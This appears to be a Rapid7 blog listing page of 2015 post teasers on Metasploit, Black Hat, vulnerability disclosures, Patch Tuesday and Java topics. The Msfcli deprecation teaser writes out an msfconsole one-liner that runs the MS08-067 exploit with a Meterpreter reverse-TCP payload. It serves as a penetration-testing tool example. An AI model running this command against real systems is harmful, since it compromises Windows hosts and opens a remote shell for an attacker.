6 min
Metasploit
Interning at Rapid7: A "git push" in the Right Direction
How I Got Here
Hey there! My name is Mo. I'm currently an intern here at Rapid7 working in the
Austin office as part of the Metasploit team. If you came here expecting a deep
understanding of Metasploit, this blog post isn't the right place. If you ARE
interested in knowing what it's like to being a small town college student
working at a leading firm in security engineering, then keep reading!
Everyone used to tell me that every mistake and failure was a push in the right
direction, but that
1 min
Legal
Rapid7's Comments on the Wassenaar Arrangement Proposed Rule
For the past two months, the Department of Commerce's Bureau of Industry and
Security (BIS) has been running a public consultation to solicit feedback on its
proposal for implementing export controls for intrusion software under the
Wassenaar Arrangement. You can read about the proposal and Rapid7's initial
thoughts here
. The consultation window closed on Monday, July 20th
3 min
Metasploit Weekly Wrapup
Weekly Metasploit WrapUp: A Wild Committer Appears!
Browser Autopwn Version 2
Hey all! If you haven't been following the Metasploit development over the last
few weeks, you know that we've been pretty busy getting Browser Autopwn Version
2 (BAPv2) out the door and into Metasploit Framework. This project was, and is,
driven by our own beloved Wei _sinn3r Chen, and
it's one of those projects around here that I'm really personally very excited
about.
If you want to jump into all the implementation details and history,
5 min
Events
The Black Hat Attendee Guide Part 5 - Meaningful Introductions
If you are just joining us, this is the fifth post in the series starting here
.
Making An Introduction
I might be wrong, but I'll argue that networking is a transitive verb, so
ENGAGE! The real magic starts happening as you progress:
* Level 1-- Start with a “Hi, my name is… ” Yes, it's that simple, thanks to
Slim Shady
* Level 2-- Demonstrate that you have an idea of the world the other person
live
2 min
IT Ops
Playing with Java 8's Completable Futures
Of the many additions to Java 8 such as the Stream API
and
lambdas
, I
noticed one of the lesser talked about ones was CompletableFutures
. So I decided to have a play around with them on the last Java component I
wrote. My use case in a nutshell was piping larg
1 min
Patch Tuesday
Oracle Java JRE AES Intrinsics Remote Denial of Service (CVE-2015-2659)
Java 8 servers versions prior to u46 are susceptible to a remote unauthenticated
denial of service (hard crash) when used with AES intrinsics (AES-NI) CPU
extensions on supported processors. AES intrinsics are enabled by default on the
Oracle JVM if the the JVM detects that processor capability, which is common for
modern processors manufactured after 2010. For more on AES-NI, see the
Wikipedia
article .
This issue was tracked in the OpenJDK p
6 min
The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 2
Hello again,
Welcome back! So yesterday we did an introduction about the brand new Browser
Autopwn 2, if you have not read that, make sure to check it out
. And today, let's talk about how to use it, what you can do with it for better
vulnerability validation and penetration testing.
As we explained in the previous blog post, Browser Autopwn 2 is a complete
redesign from the firs
2 min
Patch Tuesday, July 2015
Administrators and security teams are in for a hectic week tackling 14
Microsoft security
bulletins, 2 Adobe updates addressing 4
CVEs for Flash\Shockwave and Oracle has released their quarterly update for 63
of
their product suites (including Java, Oracle DB, MySQL and Solaris).
Of the 14 Microsoft security bulletins, 4 re
7 min
Events
The Black Hat Attendee Guide Part 2 - The Briefings
If you are just joining us, this is the second post in the series starting here
.
Content is king. Research is what binds us, and you should not be surprised that
some of the best in the game focus their annual research calendar on the Black
Hat USA CFP. Offensive security research is the tail that wags the dog—many
vendors and architects spend the year trying to get back in front of some of the
bombs dropped at Black Hat each year.
There's a
4 min
The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 1
Hi everyone,
Today, I'd like to debut a completely rewritten new cool toy for Metasploit:
Browser Autopwn 2. Browser Autopwn is the easiest and quickest way to explicitly
test browser vulnerabilities without having the user to painfully learn
everything there is about each exploit and the remote target before deployment.
In this blog post, I will provide an introduction on the tool. And then in my
next one, I will explain how you can take advantage of it to maximize your vuln
validation or pen
7 min
Web Application Security Scanning and the Art of Automation
A version of this blog was originally posted on Nov. 5, 2012.
Few people fully appreciate the difficulty in creating a web application
security scanner that can actually
work well against most sites. In addition, there is much debate about how much
application security testing can be automated and how much needs be done by
human hands. Let's look at a recent conversation
among some industry
exp
3 min
Events
The Black Hat Attendee Guide, Part 1 - How to Survive Black Hat
If you're like me, you have wanted to go to Black Hat
for ages. If you're going, have a game plan. For
first timers, this series will be a primer full of guidance and survival tips.
For returning attendees, this will help maximize your experience at Black Hat.
First, I want to give you perspective on my bias, coloring guidance offered
here. My slant is that of someone who was a booth babe (sales engineer), a
speaker, an attendee, Review Board member and former Gen
4 min
Vulnerability Disclosure
R7-2015-08: Accellion File Transfer Appliance Vulnerabilities (CVE-2015-2856, CVE-2015-2857)
This disclosure covers two issues discovered with the Accellion
File Transfer Appliance, a device used for secure
enterprise file transfers. Issue R7-2015-08.1 is a remote file disclosure
vulnerability, and issue R7-2015-08.2 is remote command execution vulnerability.
Metasploit modules have been released for both issues, as of Pull Request 5694
.
According to the vendor, both issues were addressed in version
1 min
Msfcli is No Longer Available in Metasploit
Hi everyone,
This January, we made an announcement about the deprecation of Msfcli, the
command line interface version for Metasploit. Today we are ready to say
good-bye to it. Instead of Msfcli, we recommend using the -x option in
Msfconsole. For example, here's how you can run MS08-067 in one line:
./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST ; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ; run"
You can also leverage things like resource scripts o
4 min
IT Ops
Ditch the Debugger and Use Log Analysis Instead
This guest blog post is written by Matthew Skelton, Co-founder and Principal
Consultant at Skelton Thatcher Consulting.
--------------------------------------------------------------------------------
Summary: As a Developer, you cannot attach the debugger to your application in
Production, but you can use logging in a way that helps you easily diagnose
problems in both development AND Production. You also get to make friends with
Operations people – win! The applications we’re developing and